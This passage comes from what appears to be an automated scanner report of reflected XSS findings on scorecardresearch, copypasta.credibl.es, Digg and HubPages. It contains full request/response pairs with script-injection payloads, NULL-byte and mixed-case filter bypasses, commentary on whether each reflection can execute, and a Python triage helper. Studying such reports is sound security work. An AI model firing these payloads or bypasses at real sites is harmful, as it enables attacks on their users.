Content-Length: 97

error: Unknown api key: 2b0adaafa9ad8a29fede7758fada17307e217<script>alert(1)</script>53abc6bf11f

2.5. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 1d93c<script>alert(1)</script>f83ad48726e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This confirms that angle brackets in c1 reach the script unencoded, but the payload used here does not execute: the response is a script resource rather than an HTML document, and a script tag inside a JavaScript string literal is just string content. Whether c1 allows JavaScript injection depends on whether a double quote or backslash is also reflected unescaped, which this request does not test; confirm that before reporting the High severity.

Request

GET /beacon.js?c1=81d93c<script>alert(1)</script>f83ad48726e&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"81d93c<script>alert(1)</script>f83ad48726e", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.6. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 7e92c<script>alert(1)</script>29a2dc4c34a was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

As for c1, the reflection lands inside a JavaScript string literal in a script resource, so this payload is inert; injection is only proven if a double quote or backslash is reflected unescaped, which this request does not test.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=7e92c<script>alert(1)</script>29a2dc4c34a HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"7e92c<script>alert(1)</script>29a2dc4c34a", c16:"", r:""});

2.7. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 24c33<script>alert(1)</script>f3089f61a81 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

As for c1, the reflection lands inside a JavaScript string literal in a script resource, so this payload is inert; injection is only proven if a double quote or backslash is reflected unescaped, which this request does not test.

Request

GET /beacon.js?c1=8&c2=603514524c33<script>alert(1)</script>f3089f61a81&c3=4845000000000000003&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"603514524c33<script>alert(1)</script>f3089f61a81", c3:"4845000000000000003", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.8. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 95862<script>alert(1)</script>76f209dab7e was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

As for c1, the reflection lands inside a JavaScript string literal in a script resource, so this payload is inert; injection is only proven if a double quote or backslash is reflected unescaped, which this request does not test.

Request

GET /beacon.js?c1=8&c2=6035145&c3=484500000000000000395862<script>alert(1)</script>76f209dab7e&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"484500000000000000395862<script>alert(1)</script>76f209dab7e", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.9. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 24119<script>alert(1)</script>6e5828325a3 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

As for c1, the reflection lands inside a JavaScript string literal in a script resource, so this payload is inert; injection is only proven if a double quote or backslash is reflected unescaped, which this request does not test.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=24119<script>alert(1)</script>6e5828325a3&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:35 GMT
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"24119<script>alert(1)</script>6e5828325a3", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

2.10. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 8f81a<script>alert(1)</script>dff6d8e6cce was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

As for c1, the reflection lands inside a JavaScript string literal in a script resource, so this payload is inert; injection is only proven if a double quote or backslash is reflected unescaped, which this request does not test.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=8f81a<script>alert(1)</script>dff6d8e6cce&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
re;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"8f81a<script>alert(1)</script>dff6d8e6cce", c6:"", c10:"", c15:"", c16:"", r:""});

2.11. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied unencoded into a double-quoted JavaScript string literal in beacon.js, which is served as application/x-javascript. The payload 28803<script>alert(1)</script>08c6fcd7d5f was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

As for c1, the reflection lands inside a JavaScript string literal in a script resource, so this payload is inert; injection is only proven if a double quote or backslash is reflected unescaped, which this request does not test.

Request

GET /beacon.js?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=28803<script>alert(1)</script>08c6fcd7d5f&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 18 Feb 2011 18:49:36 GMT
Date: Fri, 11 Feb 2011 18:49:36 GMT
Connection: close
Content-Length: 3599

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6035145", c3:"4845000000000000003", c4:"", c5:"", c6:"28803<script>alert(1)</script>08c6fcd7d5f", c10:"", c15:"", c16:"", r:""});

2.12. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 2 (the second path segment) is copied unencoded into the body of a 404 response that is served as text/plain. The payload ae30b<script>alert(1)</script>9f79a2b85ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

A browser that honours the declared Content-Type displays this body as text and does not execute the script. The payload executes only in clients that MIME-sniff a text/plain response into HTML; the response carries no X-Content-Type-Options: nosniff header to forbid that, so adding one is the cheap fix alongside encoding the path in the error message.

Request

GET /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:14 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 1676992181
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiledae30b<script>alert(1)</script>9f79a2b85ca/copypasta.css

2.13. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://copypasta.credibl.es
Path:   /stylesheets/compiled/copypasta.css

Issue detail

The value of REST URL parameter 3 (the third path segment) is copied unencoded into the body of a 404 response that is served as text/plain. The payload ae7a8<script>alert(1)</script>a9785df6772 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

As in 2.12, a browser that honours the declared text/plain Content-Type displays the body as text; the script runs only in clients that sniff the response into HTML, which no X-Content-Type-Options: nosniff header forbids here.

Request

GET /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772?v=2 HTTP/1.1
Host: copypasta.credibl.es
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/apple/news/2011/02/six-minute-keychain-hack-highlights-busted-iphone-security-model.ars
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Fri, 11 Feb 2011 19:22:16 GMT
Content-Type: text/plain
Connection: keep-alive
X-Cascade: pass
Content-Length: 93
X-Varnish: 3841015658
Age: 0
Via: 1.1 varnish

File not found: /stylesheets/compiled/copypasta.cssae7a8<script>alert(1)</script>a9785df6772
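The findings in 2.2 through 2.13 share one problem: the scanner reports every unencoded reflection as High, but only the text/html responses (2.4, and the Digg and HubPages pages later in this report) put the payload where a browser will execute it. The JSONP and beacon.js responses reflect into JavaScript string literals, and the copypasta 404 is text/plain. The following Python is an added triage helper, not part of the original report and not code from any of the vendors named here. It parses a raw HTTP response, finds a canary that carries a double quote, an angle bracket and a backslash (so it also answers the string-breakout question the scanner's script-tag payload leaves open), classifies the syntactic context from the text before the reflection, and combines that with the Content-Type and X-Content-Type-Options headers into a verdict. The sample responses are constructed to mirror the ones above, not captured traffic, and the context classifier is a heuristic for triage, not a parser.

```python
import html
import json
import re

# Canary carrying the three characters whose raw reflection decides the context:
# a double quote (attribute / string breakout), an angle bracket (new tag) and a
# backslash (JavaScript string escape). Name and value are assumptions.
CANARY = 'zq7"<\\zq8'

SCRIPT_TYPES = {"text/javascript", "application/javascript",
                "application/x-javascript", "application/json"}


def split_response(raw: bytes):
    """Split a raw HTTP response into (status code, lower-cased header dict, body text)."""
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, body = raw.partition(sep)
    lines = head.decode("latin-1").splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("utf-8", "replace")


def find_reflection(body: str, canary: str):
    """Locate the canary in the body and report how (if at all) it was encoded."""
    variants = [
        ("raw", canary),
        ("html_entities", html.escape(canary, quote=True)),
        ("json", json.dumps(canary)[1:-1]),   # \" and \\ escaped, '<' left alone
    ]
    for name, needle in variants:
        pos = body.find(needle)
        if pos != -1:
            return pos, name
    return None, None


def _attr_state(tag_text: str) -> str:
    """Inside a tag: is an attribute value still open at the end of tag_text?"""
    quote = None
    for ch in tag_text:
        if quote is None and ch in "\"'":
            quote = ch
        elif ch == quote:
            quote = None
    return "html_attribute" if quote else "html_tag"


def reflection_context(body: str, pos: int, media_type: str) -> str:
    """Classify the syntactic context from the text that precedes the reflection."""
    before = body[:pos]
    if media_type == "text/html":
        tag_open = before.rfind("<")
        if tag_open != -1 and ">" not in before[tag_open:]:
            return _attr_state(before[tag_open:])
        return "html_text"
    if media_type in SCRIPT_TYPES:
        # an odd number of unescaped double quotes so far means inside a string literal
        return "js_string" if len(re.findall(r'(?<!\\)"', before)) % 2 else "js_code"
    return "plain_text"


def verdict(media_type, nosniff, context, encoding) -> str:
    if encoding is None:
        return "not reflected"
    if media_type == "text/html":
        if encoding == "raw":
            return f"exploitable: raw reflection in {context} of an HTML response"
        return f"reflected in {context} but {encoding}-encoded; not exploitable with this canary"
    if context in ("js_string", "js_code"):
        if encoding == "raw":
            return f"exploitable when the script is included: quote and backslash survive inside {context}"
        return "string-escaped in a script/JSON body: no script injection; '<' only matters if a client renders the body as HTML"
    if encoding != "raw":
        return f"reflected {encoding}-encoded in {media_type}; not exploitable with this canary"
    if nosniff:
        return f"raw reflection in {media_type}; nosniff header stops HTML rendering"
    return f"raw reflection in {media_type}; executes only in clients that sniff it as HTML (no nosniff header)"


def triage(raw: bytes, canary: str = CANARY) -> dict:
    status, headers, body = split_response(raw)
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    pos, encoding = find_reflection(body, canary)
    context = reflection_context(body, pos, media_type) if pos is not None else None
    return {"status": status, "media_type": media_type, "nosniff": nosniff,
            "encoding": encoding, "context": context,
            "verdict": verdict(media_type, nosniff, context, encoding)}


# Constructed responses modelled on the findings above (not captured traffic).
SAMPLES = {
    "html_error_body": (b"HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html;charset=ISO-8859-1\r\n\r\n"
                        b"error: Unknown api key: 2b0adaafa9ad8a29fede7758fada1730" + CANARY.encode()),
    "html_attribute": (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                       b"<html><body><a href=\"#\" onclick=\"showLinkArticle('/?" + CANARY.encode()
                       + b"=1', 'HubPages'); return false;\">x</a></body></html>"),
    "script_string_raw": (b"HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n\r\n"
                          b"if(typeof COMSCORE==\"undefined\"){window.COMSCORE={}}\n"
                          b"COMSCORE.beacon({c1:\"8" + CANARY.encode() + b"\", c2:\"6035145\"});"),
    "jsonp_escaped": (b"HTTP/1.1 200 OK\r\nContent-Type: text/javascript;charset=utf-8\r\n\r\n"
                      b'fb_sharepro_render({"error_code":3,"error_msg":"Unknown method",'
                      b'"request_args":[{"key":"method","value":"links.getStats'
                      + json.dumps(CANARY)[1:-1].encode() + b'"}]});'),
    "plain_404": (b"HTTP/1.1 404 Not Found\r\nContent-Type: text/plain\r\n\r\n"
                  b"File not found: /stylesheets/compiled" + CANARY.encode() + b"/copypasta.css"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:18} {triage(raw)['verdict']}")
```

Run it and compare the five verdicts. The beacon.js-style sample comes out as exploitable only because the constructed server reflects the quote raw, which is exactly the fact the script-tag payload in 2.5 through 2.11 cannot establish; the JSONP-style sample shows the opposite outcome when quotes are JSON-escaped and only the angle bracket survives.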

2.14. http://digg.com/remote-submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied into the href of a double-quoted link element in the page head, so the double quote in the payload closes the attribute and the remainder is parsed as new markup. The payload %0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb was submitted in the REST URL parameter 1. This input was echoed as 74e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. The %00 itself is reflected literally in the href attribute, which suggests the filter inspects a decoded copy of the path that it stops reading at the NULL byte, while the output is built from the raw request-URI.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request

GET /remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:37 GMT; path=/; domain=digg.com
Set-Cookie: d=8c53a5f3d0217831cca27dd9a043299858a02c2ad24e2c437b53eb8a7149e65f; expires=Thu, 11-Feb-2021 07:16:17 GMT; path=/; domain=.digg.com
X-Digg-Time: D=241537 10.2.129.78
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15632

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%0074e09"><ScRiPt>alert(1)</ScRiPt>996a87db1cb.rss">
...[SNIP]...

2.15. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied into the href of a double-quoted link element in the page head, so the double quote in the payload closes the attribute and the remainder is parsed as new markup. The payload %00cf201"><script>alert(1)</script>56f50e4da51 was submitted in the REST URL parameter 1. This input was echoed as cf201"><script>alert(1)</script>56f50e4da51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00cf201"><script>alert(1)</script>56f50e4da51 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:08:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sat, 12-Feb-2011 21:08:08 GMT; path=/; domain=digg.com
Set-Cookie: d=7790e3bcd773131188588be60902b297e1566c5c2d8e4567c363f32a95040d0e; expires=Thu, 11-Feb-2021 07:15:48 GMT; path=/; domain=.digg.com
X-Digg-Time: D=220052 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15613

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00cf201"><script>alert(1)</script>56f50e4da51.rss">
...[SNIP]...

2.16. http://hubpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied, together with the rest of the query string, into a double-quoted onclick attribute as the first argument to showLinkArticle. The payload 548f8"><script>alert(1)</script>9a7d90ba46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response, where the double quote closes the attribute and the remainder of the payload is parsed as new markup in this text/html page.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?548f8"><script>alert(1)</script>9a7d90ba46e=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/?548f8"><script>alert(1)</script>9a7d90ba46e=1', 'HubPages'); return false;">
...[SNIP]...

2.17. http://hubpages.com/about/advertise [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /about/advertise

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied into a double-quoted onclick attribute as the first argument to showLinkArticle, on the site's 404 page. The payload 23253"><script>alert(1)</script>b500e541fe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response, where the double quote closes the attribute and the remainder of the payload is parsed as new markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about23253"><script>alert(1)</script>b500e541fe8/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
